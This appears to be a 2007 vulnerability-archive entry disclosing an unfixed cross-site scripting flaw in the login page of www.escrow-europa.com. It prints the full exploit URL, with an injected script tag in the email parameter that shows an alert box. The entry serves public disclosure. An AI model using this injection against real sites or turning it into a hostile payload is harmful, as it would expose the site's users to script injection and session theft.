Unfixed XSS vulnerability at www.escrow-europa.com

2007-12-06T00:00:00
ID XSSED:9868
Type xssed
Reporter Nemessis
Modified 2007-12-06T00:00:00

Description

Security researcher Nemessis, has submitted on 12/06/2007 a cross-site-scripting (XSS) vulnerability affecting www.escrow-europa.com, which at the time of submission ranked 681032 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/06/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.escrow-europa.com/escrow/User_Login.Asp?PROVENIENZA=ESE&LINGUAPAGINA=EN&email=%22%3E%3Cscript%3Ealert%28/Nemessis-www.rstzone.net/%29%3C%2Fscript%3E&password_1=&password_2=&LINGUAPAGINA=EN&SESSO=M&name_first=&name_last=&name_company=&country=undefined&Lingua=Select+Language&name_choice=po&birth_month=Select+From+List&birth_day=Select+From+List&birth_year=19&street_address=&street_address2=&city=&provincia=&D1=undefined&zip=&phone=&fax=&ACCETTO1=N&ACCETTO2=N&submit=Send